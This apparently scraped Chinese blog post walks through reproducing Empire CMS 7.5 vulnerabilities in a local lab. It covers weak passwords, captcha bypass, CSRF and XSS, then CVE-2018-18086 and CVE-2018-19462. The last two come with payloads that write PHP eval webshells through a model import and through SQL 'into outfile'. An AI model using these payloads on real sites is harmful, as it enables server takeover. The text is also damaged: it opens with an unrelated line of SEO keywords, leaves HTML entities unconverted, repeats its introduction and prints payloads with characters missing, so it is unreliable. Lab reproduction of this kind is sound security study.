哪个网站做图文素材多,找人做购物网站,it运维工具,下载 公司网站 程序 需要ftp权限简介
《帝国网站管理系统》英文译为Empire CMS#xff0c;简称Ecms#xff0c;它是基于B/S结构#xff0c;且功能强大而帝国CMS-logo易用的网站管理系统。 帝国CMS官网#xff1a;http://www.phome.net/ 参考相关漏洞分析文章#xff0c;加上更详细的渗透测试过程。
参考…简介
《帝国网站管理系统》英文译为Empire CMS简称Ecms它是基于B/S结构且功能强大而帝国CMS-logo易用的网站管理系统。 帝国CMS官网http://www.phome.net/ 参考相关漏洞分析文章加上更详细的渗透测试过程。
参考
帝国CMSEmpireCMSv7.5漏洞分析 帝国cms v7.5—漏洞分析
靶场搭建
环境PHPMysqlEmpireCMS7.5
安装phpstudy_pro
下载地址https://www.xp.cn/ 十分方便点击下载安装即可。
安装EmpireCMS
下载地址http://www.phome.net/download/ 解压后放在phpstudy_pro/WWW目录下 与常见的靶场安装相似访问http://127.0.0.1/upload/e/install/index.php填写相关配置信息安装即可 最后上删除/e/install目录避免被再次安装.
漏洞复现
身份鉴别类
弱口令
前台可进行密码爆破弱口令test/test123
验证码失效
使用同一验证码尝试进行登录验证码失效故可进行上述爆破。 且存在敏感信息明文传输数据包中用户名密码为url编码。 注册功能处同样存在此漏洞。 找回密码处验证码失效且可以无限发送密码重置邮件。
CSRF漏洞
修改referer依旧正常返回数据。
XSS漏洞 系统-备份与恢复数据-执行SQL语句存在XSS漏洞。 进入商城系统修改mainfile字段为“mainfilejavascript:alert(/xss/)”成果弹窗。
会话重放漏洞
找回密码功能可无限发送邮件且验证码未失效。
文件上传漏洞
CVE-2018-18086() 后台系统-管理数据表- 导入系统模型导入一个.php.mod文件内容如下。 ? php file_put_contents(test.php,?php eval(\$_POST[hack]); ?); ?
远程代码执行漏洞
CVE-2018-19462 系统-备份与恢复数据-执行SQL语句用select ... into outfile语句写入php一句话木马。 select ?php eval($_POST[123])? into outfile C:/phpstudy_pro/WWW/EmpireCMS_7.5_SC_UTF8/getshell.php
